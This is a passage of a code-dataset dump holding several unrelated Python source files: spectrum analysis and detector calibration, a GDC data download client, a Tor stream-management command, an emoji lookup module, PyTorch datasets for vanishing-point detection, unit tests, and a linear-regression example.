{}'.format(len(self.back_bins),len(self.fore_bins)))\n else:\n self.subtracted_counts=[]\n for h in range(len(self.back_bins)):\n self.subtracted_counts.append(\n self.fore_counts[h]-self.back_counts[h])\n \n def rate_normalization(self,fore_duration,back_duration):\n '''Used to rate normalize the two spectrum\n Takes as arguments:\n fore_duration- float duration of foreground accumulation\n back_duration- float duration of background accumulation\n '''\n self.fore_rates=[i/fore_duration for i in self.fore_counts]\n self.back_rates=[j/back_duration for j in self.back_counts]\n \n def 
raw_spectrum_plotter(self, first_label,title,second_label=None,yscale='linear'):\n '''\n Plot the raw foreground and background on top of each other \n Takes as arguments:\n first_label: string of first spectrum label\n second_label: string of second spectrum label\n title: descriptive title of the graph\n '''\n plt.figure(self.figure_number,figsize=[12,12])\n self.figure_number+=1\n if second_label!=None:\n plt.plot(self.back_bins,self.back_counts,label=second_label)\n plt.plot(self.fore_bins,self.fore_counts,label=first_label)\n plt.xlabel('Bins')\n plt.ylabel('Counts')\n plt.yscale(yscale)\n plt.title(title)\n plt.legend()\n plt.savefig(os.path.join(self.save_folder,\n '{}_{}.jpg'.format(title,yscale)),dpi=600)\n plt.show()\n \n def rate_spectrum_plotter(self, first_label, second_label,title):\n '''\n Plot the raw foreground and background on top of each other \n Takes as arguments:\n first_label: string of first spectrum label\n second_label: string of second spectrum label\n title: descriptive title of the graph\n '''\n plt.figure(self.figure_number)\n self.figure_number+=1\n plt.plot(self.back_rates,self.back_counts,label=first_label)\n plt.plot(self.fore_rates,self.fore_counts,label=second_label)\n plt.xlabel('Bins')\n plt.ylabel('Counts Rates')\n plt.title(title)\n plt.show()\n \n def calibrated_spectrum_plotter(self, first_label, title,calibrate,\n second_label=None,yscale='linear',\n energies=None,zoomed=None,\n back_calibration=None,\n xtick_remove=None,\n calibration_lines=None):\n plt.figure(self.figure_number,figsize=[12,5.5])\n self.figure_number+=1\n zoomer=[]\n zoomed_calibrate=[]\n zoomer_back=[]\n zoomed_back2=[]\n zoomed_back=[]\n if zoomed!=None:\n for j in range(len(calibrate)):\n if calibrate[j]>= min(zoomed) and calibrate[j]<=max(zoomed):\n zoomer.append(calibrate[j])\n zoomed_calibrate.append(self.fore_counts[j])\n if second_label!=None:\n zoomed_back.append(self.back_counts[j])\n if back_calibration!=None and second_label!=None:\n for k in range(len(back_calibration)):\n if back_calibration[k]>=min(zoomed) and back_calibration[k]<=max(zoomed):\n zoomer_back.append(back_calibration[k])\n zoomed_back2.append(self.back_counts[k])\n \n if len(zoomer)>0:\n if second_label!=None:\n if back_calibration==None:\n plt.plot(zoomer,zoomed_back,label=second_label)\n else:\n plt.plot(zoomer_back,zoomed_back2,label=second_label)\n plt.plot(zoomer,zoomed_calibrate,label=first_label)\n plt.xlim(zoomed[0],zoomed[1])\n else:\n if second_label!=None:\n if back_calibration==None:\n plt.plot(calibrate,self.back_counts,label=second_label)\n else:\n plt.plot(back_calibration,self.back_counts,label=second_label)\n \n plt.plot(calibrate,self.fore_counts,label=first_label)\n \n #add the energy lines to the graph\n if energies!=None:\n for i in energies:\n plt.axvline(x=i,linestyle='--',color='k',linewidth=0.5)\n loc,label=plt.xticks()\n for i in range(len(loc)-1):\n if loc[i]>=0:\n if round(loc[i],3)!=xtick_remove:\n energies.append(loc[i])\n plt.xticks(energies,fontsize=10, rotation=90)\n if calibration_lines!=None:\n for i in calibration_lines:\n plt.axvline(x=i, linestyle='-',color='r',linewidth=0.8)\n plt.xlabel('Energy [MeV]')\n plt.ylabel('Counts')\n plt.yscale(yscale)\n plt.title(title)\n plt.legend()\n plt.savefig(os.path.join(self.save_folder,\n 'calibrated{}_{}.jpg'.format(title,yscale)),\n dpi=500)\n plt.show()\n \n def subtracted_spectrum_plotter(self,title):\n '''Plot the background subtracted spectrum\n Takes as arguement:\n title- descriptive title of the graph\n '''\n 
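# the shared class-level figure_number counter gives every plot its own figure\n 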
plt.figure(self.figure_number)\n self.figure_number+=1\n plt.plot(self.back_bins,self.subtracted_counts,\n label='No target subtracted spectrum')\n plt.xlabel('Bins')\n plt.ylabel('Counts')\n plt.title(title)\n plt.show() \n \n def HPGE_calibration(self, energy_per_bin=0.003, background_calibration=None):\n '''Used to calibrate the HPGE detector using a linear fit\n energy_per_bin: float\n background_calibration: boolean, true to calibrate background \n spectrum'''\n if background_calibration==None:\n calibrated=[i*energy_per_bin for i in self.fore_bins]\n elif background_calibration!=None:\n calibrated=[i*energy_per_bin for i in self.back_bins]\n return calibrated\n \n def KNIFE_calibration(self, bins, energies, background_calibration=None,\n scalar=1,m=None,b=None):\n '''used to calibrate the KNIFE detector\n Takes as arguements:\n bins: a list of bins associated with each energy found in energies\n energies: a list of energies based on the bins\n background_calibration: boolean, true to calibrate background \n spectrum\n '''\n bins=np.asarray(bins)\n energies=np.asarray(energies)\n# x_2=[i**2 for i in bins]\n# xy=[bins[i]*energies[i] for i in range(len(bins))]\n if m==None:\n n=np.size(bins)\n m_x,m_y=np.mean(bins),np.mean(energies)\n xy=np.sum(bins*energies)-n*m_y*m_x\n xx=np.sum(bins*bins)-n*m_x*m_x\n m=xy/xx\n b=m_y-m*m_x\n\n if background_calibration==None:\n calibrated=[scalar*(m*i+b) for i in self.fore_bins]\n elif background_calibration!=None:\n calibrated=[scalar*(m*i+b) for i in self.back_bins]\n return calibrated\n \n def counts_scaling(self,scale_factor):\n '''Used to scale the number of counts from foreground to \n background\n '''\n self.back_counts=[i*scale_factor for i in self.back_counts]\n \n def calibration_saving(self,calib,name):\n save_location=os.path.join(os.getcwd(),'Calibrations')\n file_name=os.path.join(save_location,name+'.txt')\n f=open(file_name,'w')\n for i in calib:\n f.write('{}\\n'.format(i))\n f.close()\n \n \n#if __name__ ==\"__main__\": \n# b_loc8=os.path.join(loc8,'histogram_15-37-05.txt')\n# f_loc8=os.path.join(loc8,'histogram_16-44-29.txt')\n# #have to read in each text file, then create a new file to write just the \n# #counts to\n# b=open(b_loc8,'r')\n# b_data=b.readlines()\n# b.close()\n# bo=open(os.path.join(loc8,'KNIFE_back.txt'),'w')\n# for i in range(len(b_data)):\n# bo.write('{}\\n'.format(float(b_data[i].split(sep=',')[1])))\n# bo.close()\n# f=open(f_loc8,'r')\n# f_data=f.readlines()\n# f.close()\n# fo=open(os.path.join(loc8,'KNIFE_fore.txt'),'w')\n# for i in range(len(f_data)):\n# fo.write('{}\\n'.format(float(f_data[i].split(sep=',')[1])))\n# fo.close() #get \n# \n# #spectral analysis for the KNIFE detector\n# b_loc8=os.path.join(loc8,'KNIFE_back.txt')\n# f_loc8=os.path.join(loc8,'KNIFE_fore.txt')\n# knife_90505=Spectra_Analysis(f_loc8,b_loc8,0,0)\n# fore_90505,back_90509=knife_90505.average_count_rate(25*60,15*60)\n# knife_90505.counts_scaling(1)\n# cali=knife_90505.KNIFE_calibration([642,220],[2.22325,7.64],m=0.00348,b=-0.011291)\n## back_cali=knife_90505.KNIFE_calibration([450],[1.436],\n## background_calibration=True)\n## knife_90505.calibrated_spectrum_plotter('905-05 in beam','KNIFE with 905-05 in beam',\n## cali,second_label='No target',\n## yscale='log',\n## energies=[10.829,6.322,5.269,1.885,\n## 5.53,4.51,3.68,\n## 4.95,1.26,3.68],\n## xtick_remove=[2])\n## back_calibration=back_cali)\n# \n# #put the knife and 2x4 on top of each other\n# fore_loc8=os.path.join(loc8,'2x4LaBr_Digitizer_90505.txt') \n## 
f_loc8=os.path.join(loc8,'histogram_16-44-29.txt')\n# labr_knife=Spectra_Analysis(fore_loc8,f_loc8,0,0)\n# la_fore,la_back=labr_knife.average_count_rate(15*60,15*60)\n# labr_knife.calibrated_spectrum_plotter('2x4 w/KSU digitizer','905-05 in beam KNIFE and 2x4LaBr',\n# labr_with,second_label='KNIFE',\n# yscale='log',\n# back_calibration=cali,\n# zoomed=[0,14],\n# energies=[10.829,6.322,5.269,1.885,\n# 5.53,4.51,3.68,\n# 4.95,1.26,3.68,10.318,9.807],\n# xtick_remove=[2],\n# calibration_lines=[2.2232,7.645])\n#","sub_path":"Spectral_Analyzer2.py","file_name":"Spectral_Analyzer2.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271363387","text":"from StringIO import StringIO\nimport os\nimport requests\nimport tarfile\nimport time\nimport urlparse\n\nfrom parcel import HTTPClient, UDTClient, utils\nfrom parcel.download_stream import DownloadStream\nfrom ..query.index import GDCIndexClient\n\nimport logging\n\nlog = logging.getLogger('gdc-download')\n\nclass GDCDownloadMixin(object):\n\n def download_small_groups(self, smalls):\n # List[List[str]] -> List[List[str]]\n \"\"\"Smalls are predetermined groupings of smaller filesize files.\n They are grouped to reduce the number of open connections per download\n\n \"\"\"\n\n tarfile_url = self.data_uri + '?tarfile'\n errors = []\n groupings_len = len(smalls)\n for i, s in enumerate(smalls):\n if len(s) == 0:\n log.error('There are no files to download')\n return\n\n try:\n # post request\n # {'ids': ['id1', 'id2'..., 'idn']}\n ids = {\"ids\": s}\n\n # using a POST request lets us avoid the MAX URL character length limit\n r = requests.post(tarfile_url, stream=True, verify=self.verify, json=ids)\n if r.status_code == requests.codes.ok:\n\n # {'content-disposition': 'filename=the_actual_filename.tar'}j\n filename = r.headers.get('content-disposition') or \\\n r.headers.get('Content-Disposition')\n\n if filename:\n filename = os.path.join(self.directory, filename.split('=')[1])\n else:\n filename = time.strftime(\"gdc-client-%Y%m%d-%H%M%S\")\n log.info('Saving grouping {0}/{1}'.format(i+1, groupings_len))\n with open(filename, 'wb') as f:\n for chunk in r:\n f.write(chunk)\n else:\n log.warning('[{0}] unable to download group {1} '.format(r.status_code, i+1))\n errors.append(ids['ids'])\n time.sleep(0.5)\n\n r.close()\n\n except Exception as e:\n log.warning('Grouping download failed: {0}'.format(i+1))\n errors.append(ids['ids'])\n log.warn(e)\n\n return errors\n\n\n def parallel_download(self, stream, download_related_files=None,\n download_annotations=None, *args, **kwargs):\n\n # This is a little confusing because gdc-client\n # calls parcel's parallel_download, which is where\n # most of the downloading takes place\n stream.directory = self.directory\n super(GDCDownloadMixin, self).parallel_download(stream)\n\n\nclass GDCHTTPDownloadClient(GDCDownloadMixin, HTTPClient):\n\n def __init__(self, uri, download_related_files=True,\n download_annotations=True, *args, **kwargs):\n # accepts args, but never called with args\n self.base_uri = self.fix_url(uri)\n if not self.base_uri.endswith('/'):\n self.base_uri += '/'\n self.data_uri = urlparse.urljoin(self.base_uri, 'data/')\n self.related_files = download_related_files\n self.annotations = download_annotations\n\n self.directory = os.path.abspath(time.strftime(\"gdc-client-%Y%m%d-%H%M%S\"))\n if kwargs.get('directory'):\n self.directory = kwargs.get('directory')\n\n self.verify = kwargs.get('verify')\n 
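# super(GDCDownloadMixin, self) resolves to parcel's HTTPClient, the next class in the MRO\n 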
super(GDCDownloadMixin, self).__init__(*args, **kwargs)\n\n\nclass GDCUDTDownloadClient(GDCDownloadMixin, UDTClient):\n\n def __init__(self, remote_uri, download_related_files=True,\n download_annotations=True, *args, **kwargs):\n\n remote_uri = self.fix_url(remote_uri)\n self.base_uri = remote_uri\n self.data_uri = urlparse.urljoin(remote_uri, 'data/')\n self.related_files = download_related_files\n self.annotations = download_annotations\n self.directory = os.path.abspath(time.strftime(\"gdc-client-%Y%m%d-%H%M%S\"))\n super(GDCDownloadMixin, self).__init__(*args, **kwargs)\n","sub_path":"gdc_client/download/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"221858231","text":"from __future__ import print_function\n\nimport os\nimport sys\nimport functools\n\nfrom twisted.python import usage, log\nfrom twisted.internet import defer, reactor\nimport zope.interface\nimport txtorcon\n\nfrom carml.interface import ICarmlCommand\nfrom carml import util\n\n\nclass StreamOptions(usage.Options):\n def __init__(self):\n super(StreamOptions, self).__init__()\n self.longOpt.remove('version')\n self.longOpt.remove('help')\n self['delete'] = []\n\n optFlags = [\n ('list', 'L', 'List existing streams.'),\n # ('per-process', 'p', 'Attach all new streams to one circuit, per PID.'),\n ]\n\n optParameters = [\n ('attach', 'a', 0, 'Attach all new streams to a particular circuit-id.', int),\n ('close', 'd', 0, 'Delete/close a stream by its ID.', int),\n ]\n\n\ndef attach_streams_per_process(state):\n print(\"Exiting (e.g. Ctrl-C) will cause Tor to resume choosing circuits.\")\n print(\"Giving each new PID we see its own Circuit (until they're gone).\")\n\n class Attacher(object):\n zope.interface.implements(txtorcon.IStreamAttacher)\n\n def __init__(self):\n self.pid_to_circuits = {}\n\n def choose_new_circuit(self, stream, circuits):\n for circ in circuits.values():\n if circ in self.pid_to_circuits.values():\n continue\n if circ.state != 'BUILT':\n continue\n return circ\n raise RuntimeError(\"Ran out of circuits to select.\")\n\n def attach_stream(self, stream, circuits):\n src_addr, src_port = stream.flags['SOURCE_ADDR'].split(':')\n pid = txtorcon.util.process_from_address(src_addr, src_port)\n procname = os.path.realpath('/proc/%d/exe' % pid)\n\n try:\n circ = self.pid_to_circuits[pid]\n except KeyError:\n circ = self.choose_new_circuit(stream, circuits)\n self.pid_to_circuits[pid] = circ\n print('Selected circuit %d for process %d (%s).' % (circ.id, pid, procname))\n print(' ', '->'.join([p.name if p.name_is_unique else ('{%s}' % p.name) for p in circ.path]))\n\n# if stream.state == 'NEWRESOLVE':\n# print \" attaching %d (resolve %s)\" % (stream.id, stream.target_host)\n# else:\n print(\" attaching stream %d to circuit %d for %s:%d (%s)\" % (stream.id, circ.id, stream.target_host, stream.target_port, procname))\n return circ\n\n state.set_attacher(Attacher(), reactor)\n\n\ndef attach_streams_to_circuit(circid, state):\n circ = state.circuits[circid]\n print(\"Exiting (e.g. 
Ctrl-C) will cause Tor to resume choosing circuits.\")\n print(\"Attaching all new streams to Circuit %d.\" % circ.id)\n print(\" \", '->'.join([p.name if p.name_is_unique else ('~%s' % p.name) for p in circ.path]))\n\n class Attacher(object):\n zope.interface.implements(txtorcon.IStreamAttacher)\n\n def attach_stream(self, stream, circuits):\n if stream.state == 'NEWRESOLVE':\n print(\" attaching %d (resolve %s)\" % (stream.id, stream.target_host))\n else:\n print(\" attaching %d %s:%d\" % (stream.id, stream.target_host,\n stream.target_port))\n return circ\n\n state.set_attacher(Attacher(), reactor)\n # FIXME doesn't exit on control-c? :(\n d = defer.Deferred()\n d.addBoth(lambda x: print('foo', x))\n return d\n\n\ndef list_streams(state, verbose):\n print(\"Streams:\")\n for stream in state.streams.values():\n flags = str(stream.flags) if stream.flags else 'no flags'\n state = stream.state\n state_to_color = dict(SUCCEEDED=util.colors.green,\n FAILED=util.colors.red)\n if state in state_to_color:\n state = state_to_color[state](state)\n print(\" %d: %s on circuit %d (%s)\" % (stream.id, state, stream.circuit.id,\n flags))\n if verbose:\n h = stream.target_addr if stream.target_addr else stream.target_host\n source = txtorcon.util.process_from_address(stream.source_addr, stream.source_port)\n if source is None:\n source = 'unknown'\n print(\" to %s:%s, from %s\" % (h, stream.target_port, source))\n\n reactor.stop()\n\n\n@defer.inlineCallbacks\ndef close_stream(state, streamid):\n class DetermineStreamClosure(object):\n def __init__(self, target_id, done_d):\n self.circ_id = str(target_id)\n self.stream_gone = False\n self.already_deleted = False\n self.completed_d = done_d\n\n def __call__(self, text):\n cid, what, _ = text.split(' ', 2)\n if what in ['CLOSED', 'FAILED']:\n if self.circ_id == cid:\n self.stream_gone = True\n print(\"gone (%s)...\" % self.circ_id,)\n sys.stdout.flush()\n if self.already_deleted:\n self.completed_d.callback(self)\n if streamid not in state.streams:\n print('No such stream \"%s\".' % streamid)\n return\n print('Closing stream \"%s\"...' % (streamid, ))\n\n gone_d = defer.Deferred()\n monitor = DetermineStreamClosure(streamid, gone_d)\n state.protocol.add_event_listener('STREAM', monitor)\n sys.stdout.flush()\n\n try:\n status = yield state.streams[streamid].close()\n status = status.state\n monitor.already_deleted = True\n except txtorcon.TorProtocolError as e:\n print(util.colors.red('Error: ') + e.what())\n return\n\n if monitor.stream_gone:\n print(status)\n return\n\n print('%s (waiting for CLOSED)...' 
% status)\n sys.stdout.flush()\n yield gone_d\n # we're now awaiting a callback via CIRC events indicating\n # that our stream has entered state CLOSED\n\n\nclass StreamCommand(object):\n zope.interface.implements(ICarmlCommand)\n\n # Attributes specified by ICarmlCommand\n name = 'stream'\n options_class = StreamOptions\n help_text = 'Manipulate Tor streams.'\n controller_connection = True\n build_state = True\n\n def validate(self, options, mainoptions):\n cmds = ['attach', 'list', 'close'] # , 'per-process']\n not_a_one = all(map(lambda x: not options[x], cmds))\n if not_a_one:\n raise RuntimeError(\"Specify one of: \" + ', '.join(cmds))\n\n def run(self, options, mainoptions, state):\n \"\"\"\n ICarmlCommand API\n \"\"\"\n\n verbose = True\n if 'verbose' in options:\n verbose = options['verbose']\n if options['attach']:\n return attach_streams_to_circuit(options['attach'], state)\n# elif options['per-process']:\n# return attach_streams_per_process(state)\n elif options['list']:\n return list_streams(state, verbose)\n elif options['close']:\n d = close_stream(state, options['close'])\n d.addBoth(lambda x: reactor.stop())\n return d\n\n reactor.stop()\n\ncmd = StreamCommand()\n__all__ = ['cmd']\n","sub_path":"carml/command/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"611382458","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\emoji_cli\\emoji_dict.py\n# Compiled at: 2019-04-12 01:39:25\n# Size of source mod 2**32: 2365 bytes\n\"\"\"\nDesc: Emoji python dict module.\nAuthor: binbin.hou\nDate: 2019-4-11 20:24:25\nSince: 0.0.1\n\"\"\"\nimport os\nfrom io import open\nfrom emoji_cli import emoji_const as const\nfrom emoji_cli.emoji_util import *\n\nclass Dict(object):\n __doc__ = '\\n 获取字典信息\\n '\n _Dict__emoji_info_dict = {}\n _Dict__current_path = os.path.dirname(os.path.abspath(__file__))\n\n def __init__(self):\n \"\"\"\n 内部初始化\n \"\"\"\n self._Dict__init_dict(const.EMOJI_DATA_PATH, self._Dict__emoji_info_dict)\n\n def __init_dict(self, relative_path, emoji_dict):\n \"\"\"\n 初始化所有的字典信息\n 1. 跳过空白行\n 2. 跳过#开头的行(实际为分组)\n :param relative_path: 相对文件路径\n :param emoji_dict: 原始集合\n :return: 无\n \"\"\"\n with open((self._Dict__current_path + relative_path), mode='r', encoding=(const.DEFAULT_CHARSET)) as (stc):\n for line in stc:\n if line.startswith('#'):\n continue\n if StrUtil.is_empty(line.strip()):\n continue\n lines = line.split(StrUtil.COMMA)\n emoji_dict[lines[0]] = lines[1].strip()\n\n def name(self, emoji):\n \"\"\"\n 获取 emoji 对应的英文名称\n :param emoji: emoji 字符\n :return: 英文名称\n \"\"\"\n return self._Dict__get_val(emoji, self._Dict__emoji_info_dict)\n\n def emoji(self, english_name):\n \"\"\"\n 获取 emoji 对应的英文名称\n :param english_name: 英文名称\n :return: 表情列表\n \"\"\"\n result_list = []\n for key, value in self._Dict__emoji_info_dict.items():\n if value.find(english_name) >= 0:\n result_list.append(key)\n\n return result_list\n\n @staticmethod\n def __get_val(key, _Dict__dict):\n \"\"\"\n 获取对应的值\n 1. 如果 key 为空,直接返回\n 2. 
如果没获取到值,默认返回 key\n :param key: 入参\n :param __dict: 对应的字典信息\n :return: 结果\n \"\"\"\n result = _Dict__dict.get(key, StrUtil.EMPTY)\n return result\n\n\ndict_singleton = Dict()","sub_path":"pycfiles/emoji_cli-0.0.1-py3.7/emoji_dict.cpython-37.py","file_name":"emoji_dict.cpython-37.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"453029592","text":"import os\nimport torch\nimport random\nimport pickle\n\nimport numpy as np\nimport torchvision.transforms as transforms\n\nfrom PIL import Image\nfrom torch.utils.data.dataset import Dataset\n\nfrom libs.utils import *\nfrom libs.neurvps_func import *\n\n\nclass Train_Dataset_MNet(Dataset):\n\n def __init__(self, cfg):\n # cfg\n self.cfg = cfg\n\n self.width = cfg.width\n self.height = cfg.height\n\n # load datalist\n with open(cfg.pickle_dir + 'MNet/train_candidates.pickle', 'rb') as f:\n self.datalist = pickle.load(f)\n\n self.transform = transforms.Compose([transforms.Resize((cfg.height, cfg.width), 2),\n transforms.ToTensor()])\n self.normalize = transforms.Normalize(mean=cfg.mean, std=cfg.std)\n\n def get_image(self, flip, idx):\n img_name = self.cfg.dataset_dir + self.datalist[idx]['img_path']\n img = Image.open(img_name).convert('RGB')\n if flip == 1:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n width, height = img.size\n return img, torch.FloatTensor([height, width]), self.datalist[idx]['img_path']\n\n\n def get_line(self, flip, idx):\n\n # load pickle\n data = self.datalist[idx]\n\n if flip == 1:\n # positive set\n for i in range(len(data['pos'])):\n data['pos'][i][:, 0] = self.width - 1 - data['pos'][i][:, 0]\n data['pos'][i][:, 2] = self.width - 1 - data['pos'][i][:, 2]\n\n # negative set\n for i in range(len(data['neg'])):\n data['neg'][i][:, 0] = self.width - 1 - data['neg'][i][:, 0]\n data['neg'][i][:, 2] = self.width - 1 - data['neg'][i][:, 2]\n\n return data\n\n def __getitem__(self, idx):\n\n # flip\n flip = random.randint(0, 1)\n\n # get pre-processed images\n img, img_size, img_name = self.get_image(flip, idx)\n img = self.transform(img)\n\n # load candidate label\n training_data = self.get_line(flip, idx)\n\n return {'img_rgb': img,\n 'img': self.normalize(img),\n 'img_size': img_size,\n 'img_name': img_name,\n 'flip': flip,\n 'training_data': training_data}\n\n def __len__(self):\n return len(self.datalist)\n\n\n\nclass AVA_Test_Dataset(Dataset):\n\n def __init__(self, cfg):\n # cfg\n self.cfg = cfg\n\n # image size\n self.height = cfg.height\n self.width = cfg.width\n\n # load datalist\n with open(self.cfg.dataset_dir + 'neurvps_test.pickle', 'rb') as f:\n self.datalist = pickle.load(f)\n\n # image transform\n self.transform = transforms.Compose([transforms.Resize((self.height, self.width), 2),\n transforms.ToTensor()])\n self.normalize = transforms.Normalize(mean=cfg.mean, std=cfg.std)\n\n def get_image(self, flip, idx):\n\n img_path = self.cfg.dataset_dir + self.datalist['img_path'][idx]\n\n img = Image.open(img_path).convert('RGB')\n if flip == 1:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n width, height = img.size\n\n return img, torch.FloatTensor([height, width]), self.datalist['img_path'][idx]\n\n def get_vp(self, img_size, idx):\n\n label = (self.cfg.dataset_dir + self.datalist['img_path'][idx]).replace('.jpg', '.txt')\n axy, bxy = np.genfromtxt(label, skip_header=1)\n\n a0, a1 = np.array(axy[:2]), np.array(axy[2:])\n b0, b1 = np.array(bxy[:2]), np.array(bxy[2:])\n xy = intersect(a0, a1, b0, b1) - 0.5\n\n xy[0] *= 
self.width / img_size[1]\n xy[1] *= self.height / img_size[0]\n\n vpts = np.array([[xy[0] / (self.width / 2) - 1, 1 - xy[1] / (self.height / 2), 1]])\n vpts[0] /= LA.norm(vpts[0])\n vpts = np.float32(vpts)\n return self.datalist['gtline'][idx], vpts, xy\n\n\n def __getitem__(self, idx):\n\n # flip\n flip = 0\n\n # get pre-processed images\n img, img_size, img_name = self.get_image(flip, idx)\n img = self.transform(img)\n\n gt, vp, vp_xy = self.get_vp(img_size, idx)\n\n return {'img_rgb': img,\n 'img': self.normalize(img),\n 'img_size': img_size,\n 'img_name': img_name,\n 'flip': flip,\n 'gt': gt,\n 'vp': vp,\n 'vp_xy': vp_xy}\n\n def __len__(self):\n return len(self.datalist['img_path'])\n","sub_path":"Dominant_parallel_lines_detection/MNet/code/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"371031089","text":"# -*- encoding: utf-8 -*-\n#\n# (c) Copyright 2016 Hewlett Packard Enterprise Development LP\n# Copyright 2016 Universidade Federal de Campina Grande\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nUnit test cases for the node.py module.\n\"\"\"\n\nfrom ovm_ironic.model.metric import Metric\nfrom ovm_ironic.model.node import Node\nfrom base import TestBase\n\nimport ovm_ironic.shared.constants as const\n\n\nclass TestNode(TestBase):\n \"\"\"This class test the node module from the ovm_ironic.model.\n \"\"\"\n def setUp(self):\n \"\"\"Setting up the tests.\n \"\"\"\n super(TestNode, self).setUp()\n\n def tearDown(self):\n \"\"\"Tearing down the tests.\n \"\"\"\n super(TestNode, self).tearDown()\n\n def test_node_is_not_none(self):\n \"\"\"Test case regarding it a node is None.\n Test flow:\n >>> Checks if a new node is not equal to None.\n \"\"\"\n # testing if it is not none Instace\n self.assertNotEqual(Node(''), None)\n\n def test_node_name(self):\n \"\"\"Test case regarding the name of a node.\n Test flow:\n >>> Creates a new node with \"new-node\" as parameter; and,\n >>> Checks if the new node has \"new-node\" as its name.\n \"\"\"\n # testing if its name is equal to its supposed value\n node = Node('new-node')\n self.assertEquals(node.server_hardware_uuid, 'new-node')\n\n def test_node_metrics(self):\n \"\"\"Test cases regarding node metrics.\n Test flow:\n >>> Creates a dimension dim1 based on a template constant;\n >>> Creates an attribute 'server_hardware_uuid' with the value '123' to\n this dim1;\n >>> Creates an attribute 'service' based on a service name\n constant to this dim1;\n >>> Creates a dimension dim2 based on a template constant;\n >>> Creates an attribute 'server_hardware_uuid' with the value '321' to\n dim2;\n >>> Creates an attribute 'service' based on a service name\n constant to dim2;\n >>> Creates a metric metric1 with \"new-metric1\" and dim1 as parameters;\n >>> Creates a metric metric2 with \"new-metric2\" and dim2 as parameters;\n >>> Creates a set of metrics and adds metric1 and metric2 to it;\n >>> Creates 
a node with 'uuid-server-hardware' and the metrics set as\n        parameters;\n        >>> Checks if the size of the collection of metrics of the node is equal to 2;\n        and,\n        >>> Checks if the node name is equal to 'uuid-server-hardware'.\n        \"\"\"\n        # testing that its dimensions have the expected names\n        dim1 = const.TEMPLATE_DIMENSIONS\n        dim1['server_hardware_uuid'] = '123'\n        dim1['service'] = const.SERVICE_NAME\n\n        dim2 = const.TEMPLATE_DIMENSIONS\n        dim2['server_hardware_uuid'] = '321'\n        dim2['service'] = const.SERVICE_NAME\n\n        metric1 = Metric('new-metric1', dim1)\n        metric2 = Metric('new-metric2', dim2)\n        metrics = set()\n        metrics.add(metric1)\n        metrics.add(metric2)\n\n        node = Node('uuid-server-hardware', metrics)\n\n        self.assertEquals(len(node.metrics), 2)\n        self.assertEquals(node.server_hardware_uuid, 'uuid-server-hardware')\n\n    def test_node_methods(self):\n        \"\"\"Test cases regarding the methods of the node object.\n        Test flow:\n        >>> Creates an empty metrics set;\n        >>> Creates a node with 'uuid-server-hardware' and the metrics set as\n        parameters;\n        >>> Checks if a node is equal to itself;\n        >>> Checks if a node is not None;\n        >>> Checks if a node is not equal to another one;\n        >>> Checks if the __hash__ method has the same return when called twice; and,\n        >>> Checks if the __repr__ method has the same return when called twice.\n        \"\"\"\n\n        metrics = set()\n\n        node = Node('uuid-server-hardware', metrics)\n\n        self.assertTrue(node.__eq__(node))\n        self.assertFalse(node.__eq__(None))\n        self.assertFalse(node is Node('other_node', metrics))\n        self.assertEquals(node.__hash__(), node.__hash__())\n        self.assertEquals(node.__repr__(), node.__repr__())\n","sub_path":"ovm-ironic/tests/test_node.py","file_name":"test_node.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"353920087","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\n\ndef ReadData():\n    Xfile = Path(\"./TemperatureControlXData.dat\")\n    Yfile = Path(\"./TemperatureControlYData.dat\")\n\n    if Xfile.exists() & Yfile.exists():\n        X = np.load(Xfile)\n        Y = np.load(Yfile)\n\n        return X.reshape(1, -1), Y.reshape(1, -1)\n    else:\n        return None, None\n\ndef ForwardCalculation(w, x, b):\n    z = np.dot(w, x) + b\n    return z\n\ndef BackPropagation(x, y, z):\n    dZ = z - y\n    dB = dZ\n    dW = np.dot(dZ, x)\n    return dW, dB\n\ndef UpdateWeights(w, b, dW, dB, eta):\n    w = w - eta*dW\n    b = b - eta*dB\n    return w,b\n\ndef Inference(w,b,x):\n    z = ForwardCalculation(w, x, b)\n    return z\n\ndef GetSample(X,Y,i):\n    x = X[0,i]\n    y = Y[0,i]\n    return x,y\n\ndef ShowResult(X, Y, w, b, iteration):\n    # draw sample data\n    plt.plot(X, Y, \"b.\")\n    # draw prediction data\n    PX = np.linspace(0,1,10)\n    PZ = w*PX + b\n    plt.plot(PX, PZ, \"r\")\n    plt.title(\"Air Conditioner Power\")\n    plt.xlabel(\"Number of Servers(K)\")\n    plt.ylabel(\"Power of Air Conditioner(KW)\")\n    plt.show()\n    print(iteration)\n    print(w,b)\n\nif __name__ == '__main__':\n    # learning rate\n    eta = 0.1\n    # set w,b=0, you can set other values to have a try\n    #w, b = np.random.random(),np.random.random()\n    w, b = 0, 0\n    # read the training data\n    X, Y = ReadData()\n    # count of samples\n    num_example = X.shape[1]\n    print(\"num_example=\", num_example)\n    for i in range(num_example):\n        # get x and y value for one sample\n        x,y = GetSample(X,Y,i)\n        # get z from x,y\n        z = 